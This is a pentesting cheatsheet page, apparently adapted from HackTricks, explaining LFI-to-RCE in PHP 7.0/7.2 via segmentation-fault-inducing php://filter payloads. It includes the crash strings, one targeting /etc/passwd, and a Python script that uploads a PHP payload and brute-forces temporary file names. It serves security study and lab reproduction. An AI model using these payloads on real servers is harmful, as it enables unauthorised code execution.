daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

lfi2rce-via-segmentation-fault.md (3574B)


      1 ---
      2 title: "LFI2RCE via Segmentation Fault"
      3 section: "Web Pentesting"
      4 sectionSlug: "pentesting-web"
      5 sourcePath: "src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # LFI2RCE via Segmentation Fault
     14 
     15 The following `php://filter` payloads caused segmentation faults in the specific PHP 7.0 and 7.2 environments used by the original challenge writeups.<sup>[[1]](#references)[[2]](#references)</sup>
     16 
     17 > [!NOTE]
     18 > These are version-specific crashes, not reliable payloads for current PHP releases. Reproduce them only in a controlled environment that matches the affected build.
     19 
     20 ```php
     21 // PHP 7.0
     22 include("php://filter/string.strip_tags/resource=/etc/passwd");
     23 
     24 // PHP 7.2
     25 include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");
     26 ```
     27 
     28 For a multipart POST upload, PHP stores the file in its configured upload temporary directory, or the system temporary directory when none is configured. Unless the application moves or renames it, PHP normally deletes the temporary file at the end of the request.<sup>[[3]](#references)</sup>
     29 
     30 In the affected versions, crashing PHP during the upload can interrupt that cleanup and leave the temporary file behind. If a separate local file inclusion (LFI) vulnerability can include files from the temporary directory, an attacker can search for the generated name and include the uploaded PHP payload.<sup>[[1]](#references)[[2]](#references)</sup>
     31 
     32 The archived `easyengine/php7.0` container can provide a PHP 7.0 test environment.<sup>[[4]](#references)</sup>
     33 
     34 ```python
     35 # Upload a file while triggering the segmentation fault.
     36 import requests
     37 url = "http://localhost:8008/index.php?i=php://filter/string.strip_tags/resource=/etc/passwd"
     38 with open("la.php", "rb") as payload:
     39     try:
     40         requests.post(url, files={"file": payload})
     41     except requests.RequestException:
     42         pass  # The deliberately crashed worker may drop the connection.
     43 
     44 # Search for a six-character PHP temporary-file suffix.
     45 import itertools
     46 import string
     47 
     48 charset = string.ascii_letters + string.digits
     49 base_url = "http://127.0.0.1:8008"
     50 
     51 # This exhaustive 62^6 loop is intentionally simple and can take a very long time.
     52 for chars in itertools.product(charset, repeat=6):
     53     suffix = "".join(chars)
     54     candidate = f"{base_url}/index.php?i=/tmp/php{suffix}"
     55     response = requests.get(candidate, timeout=5)
     56     if b"spyd3r" in response.content:
     57         print(f"[+] Include succeeded: {candidate}")
     58         break
     59 ```
     60 
     61 The exhaustive example is useful for illustrating the filename search, but it is not operationally efficient. In a lab, constrain the candidate space with observed temporary-name behavior or use bounded concurrency without overwhelming the target.
     62 
     63 ## References
     64 
     65 - [1] [One Line PHP Challenge and the Return of One Line PHP Challenge writeup](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/)
     66 - [2] [PHP segmentation fault via php://filter chains (HackMD writeup)](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view)
     67 - [3] [PHP manual: POST method uploads](https://www.php.net/manual/en/features.file-upload.post-method.php)
     68 - [4] [Docker Hub: `easyengine/php7.0`](https://hub.docker.com/r/easyengine/php7.0)